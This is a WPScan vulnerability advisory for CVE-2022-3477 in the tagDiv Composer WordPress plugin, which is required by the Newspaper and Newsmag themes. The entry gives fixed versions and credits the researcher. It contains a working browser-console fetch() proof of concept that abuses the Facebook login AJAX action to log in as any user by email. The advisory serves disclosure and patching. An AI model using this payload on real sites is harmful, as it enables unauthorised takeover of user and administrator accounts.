WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

tagDiv Composer < 3.5 - Unauthenticated Account Takeover

Description

The plugin, required by the themes, does not properly implement the Facebook login feature, allowing unauthenticated attackers to login as any user by just knowing their email address

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=td_ajax_fb_login_user&user[email][email protected]',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Then refresh the page to be logged in as the user with the [email protected] email address

Affects Plugins

td-composer
Fixed in version 3.5

Affects Themes

Newspaper
Fixed in version 12.1
Newsmag
Fixed in version 5.2.2

References

CVE
CVE-2022-3477

Classification

Type

AUTHBYPASS

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-287

Miscellaneous

Original Researcher

Truoc Phan

Submitter

Truoc Phan from Techlab Corporation

Submitter website
https://www.facebook.com/292706121240740
Submitter twitter
truocphan
Verified

Yes

WPVDB ID
993a95d2-6fce-48de-ae17-06ce2db829ef

Timeline

Publicly Published

2022-10-24 (about 3 months ago)

Added

2022-10-24 (about 3 months ago)

Last Updated

2022-10-24 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin